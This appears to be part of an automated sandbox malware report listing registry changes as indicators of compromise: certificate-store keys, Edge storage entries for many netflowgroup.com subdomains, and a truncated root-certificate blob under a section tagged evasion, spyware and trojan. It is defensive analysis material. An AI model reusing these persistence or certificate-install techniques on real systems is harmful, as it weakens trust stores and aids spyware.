Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-82 = "Atlantic Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1501 = "Turkey Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-681 = "E. Australia Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-261 = "GMT Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-162 = "Central Standard Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-104 = "Central Brazilian Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-491 = "India Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-272 = "Greenwich Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2492 = "Aus Central W. Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2002 = "Cabo Verde Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1801 = "Line Islands Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-542 = "Myanmar Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2391 = "Aleutian Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time"	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	DrvInst.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-342 = "Egypt Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	mask_svc.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.execertreq.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\announce.netflowgroup.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "44"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\reaction.netflowgroup.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\hotjar.com\Total = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\important.netflowgroup.com = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\release.netflowgroup.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = 30386578a513d701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\americascardroom.eu\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus	certreq.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DomainSuggestion\FileNames\en-US = "en-US.1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\directive.netflowgroup.com = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url4 = "https://login.live.com/"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\communication.netflowgroup.co	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\handicap.netflowgroup.com\ = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\reaction.netflowgroup.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "395205405"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\news.netflowgroup.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\announce.netflowgroup.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\tropical.netflowgroup.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\contempt.netflowgroup.com\ = "0"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TypedURLs\url1 = "https://www.facebook.com/"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\moment.netflowgroup.com	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "48"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\lpsnmedia.net\Total = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 5889fed7a413d701	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\sms.netflowgroup.com\ = "0"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\cannonball.netflowgroup.co	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "268435456"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\now.netflowgroup.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\struggle.netflowgroup.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\vars.hotjar.com	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\bulletin.netflowgroup.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\report.netflowgroup.com\ = "0"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\netflowgroup.com\NumberOfSubd = "46"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BingPageData\RulesFileNextUpdateDate = "321992828"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\clik.netflowgroup.com	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\americascardroom.eu\Total = "258"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 15 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

tapinstall.exeaskinstall20.exeSetup.exevpn.tmp

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e633119301706035504